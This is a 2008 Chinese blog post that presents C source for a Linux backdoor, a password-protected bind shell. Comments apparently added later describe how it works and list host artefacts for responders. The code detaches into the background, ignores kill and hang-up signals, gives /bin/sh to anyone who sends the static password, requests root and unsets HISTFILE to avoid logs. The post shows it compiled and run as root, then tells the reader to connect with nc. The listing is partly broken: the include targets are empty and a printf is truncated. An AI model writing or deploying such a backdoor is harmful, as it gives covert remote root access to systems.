分类: LINUX
2008-03-22 23:58:29
linux后门程序
/* Reference: (c) 2000 by Mixter -- the rest of this attribution comment was lost when the page was extracted. */
[root@localhost root]#cat tcps.c
/*
 * Reviewer's reading of tcps.c, written for analysts and responders.
 *
 * What the code does: a password-gated bind shell. It detaches into the
 * background, listens on the TCP port given as argv[1] on all interfaces,
 * compares the first data it receives against the compile-time PASSWORD and,
 * on a match, attaches /bin/sh to the connection.
 *
 * Host artefacts that follow directly from the code below:
 *   - a listening TCP socket bound to INADDR_ANY, owned by an unexpected
 *     binary (the transcript at the end runs it as ./a.out);
 *   - a process that ignores SIGHUP, SIGTERM and SIGINT;
 *   - an "sh" process whose descriptors 0, 1 and 2 all refer to a TCP socket;
 *   - HISTFILE removed from that shell's environment.
 * PASSWORD is a plain string constant, so it is presumably recoverable from
 * the compiled binary, and it crosses the network unencrypted.
 *
 * NOTE(review): the listing is incomplete as extracted. The targets of the
 * seven #include lines and the tail of the usage printf() are missing. The
 * code is kept exactly as found.
 */
#include
#include
#include
#include
#include
#include
#include
#define backlog 64 /* queue length passed to listen() */
#define PASSWORD "password" /* connection password (static, plaintext) */
main(int argc,char **argv)
{
    int listenfd,connectfd,f;
    pid_t pid;
    struct sockaddr_in server;
    struct sockaddr_in client;
    u_int sin_size;
    char p[1000]; /* receive buffer for the password attempt; not initialised */

    /* Exactly one argument is expected: the port to listen on.
     * The usage string below is truncated in the source page. */
    if(argc!=2)
    {
        printf("./tcps exit(1);
    }

    /* SIGHUP, SIGTERM and SIGINT are ignored, so a default `kill` (SIGTERM)
     * or a terminal hang-up does not stop the process. SIGCHLD is ignored
     * too, and the code never waits for its children. */
    signal(SIGCHLD, SIG_IGN);
    signal(SIGHUP, SIG_IGN);
    signal(SIGTERM, SIG_IGN);
    signal(SIGINT, SIG_IGN);

    /* Background the program: any non-zero fork() result (the parent, or -1
     * on failure) exits, and only the child continues. The transcript shows
     * the prompt returning immediately after ./a.out 1234. */
    if (fork()) exit(0);

    listenfd=socket(AF_INET,SOCK_STREAM,0);
    if(listenfd==-1)
    {
        printf("socket fail\n");
        exit(1);
    }

    /* Bind to every local address (INADDR_ANY) on the port from argv[1].
     * atoi() does no validation of the argument. */
    memset(&server,0,sizeof(server));
    server.sin_family=PF_INET;
    server.sin_port=htons(atoi(argv[1]));
    server.sin_addr.s_addr=htonl(INADDR_ANY);
    if(bind(listenfd,(struct sockaddr*)&server,sizeof(server))==-1)
    {
        printf("bind fail\n");
        exit(1);
    }
    if(listen(listenfd,backlog)==-1)
    {
        printf("listen fail\n");
        exit(1);
    }

    /* accept() is called once, here; the loop below does not call it again.
     * NOTE(review): after the first connection the parent's `continue`
     * re-tests the same connectfd value, so the parent presumably keeps
     * forking. On a host that would appear as a burst of short-lived child
     * processes. */
    sin_size=sizeof(client);
    connectfd=accept(listenfd,(struct sockaddr *)&client,&sin_size);
    while(connectfd)
    {
        pid=fork();
        if (pid>0)
        {
            /* Parent: drop its copy of the connection. */
            close(connectfd);
            continue;
        }
        else if (pid==0)
        {
            /* Child: read the password attempt. The return value of recv()
             * is not checked and p is not explicitly terminated. */
            recv(connectfd, p, 1000, 0);
#ifndef REMOTELY_EXPLOITABLE
            /* Replace the listed shell metacharacters and CR/LF with NUL.
             * This also cuts the received string at the first such byte,
             * e.g. at the newline a client sends after the password. */
            for (f = 0; f < strlen(p); f++)
                switch (p[f])
                {
                case '|':
                case ';':
                case '&':
                case '>':
                case '`':
                case '\r':
                case '\n':
                    p[f] = '\0';
                    break;
                }
#endif /* REMOTELY_EXPLOITABLE :P */
            /* Compare against the static password. On mismatch the peer is
             * sent "fail" followed by 4 bytes: \377 \373 \001 plus the
             * literal's terminating NUL. The three bytes match the Telnet
             * sequence IAC WILL ECHO. The child then exits. */
            if (strncmp(p, PASSWORD,32) != 0)
            {
                send(connectfd, "fail", 4, 0);
                send(connectfd, "\377\373\001", 4, 0);
                close(connectfd);
                exit(1);
            }
            printf("connect success");
            /* Replace stdin, stdout and stderr with the connection, so the
             * shell started below reads from and writes to the socket. */
            close(0);
            close(1);
            close(2);
            dup2(connectfd, 0);
            dup2(connectfd, 1);
            dup2(connectfd, 2);
            /* Request real and effective UID 0. The result is not checked.
             * The transcript shows the program being started as root. */
            setreuid(0, 0);
            /* Fixed PATH for the shell; note the trailing "." entry. */
            setenv("PATH", "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.", 1);
            /* Presumably so the shell does not write a history file. For
             * responders: do not expect shell history from these sessions. */
            unsetenv("HISTFILE");
            execl("/bin/sh", "sh", (char *) 0);
            /* Reached only if execl() fails. */
            close(connectfd);
            exit(0);
        }
        else
        {
            /* fork() returned a negative value. */
            printf("fork fail.\n");
            exit(1);
        }
    }
    close(listenfd);
}
[root@localhost root]# gcc tcps.c
[root@localhost root]# ./a.out 1234
[root@localhost root]#
然后就可以在windows下用nc连接了 nc -vv ip/域名 后门端口号 输入密码就ok了 不过程序还是有些小毛病。。。。。。。。。。。。。。。。。。 |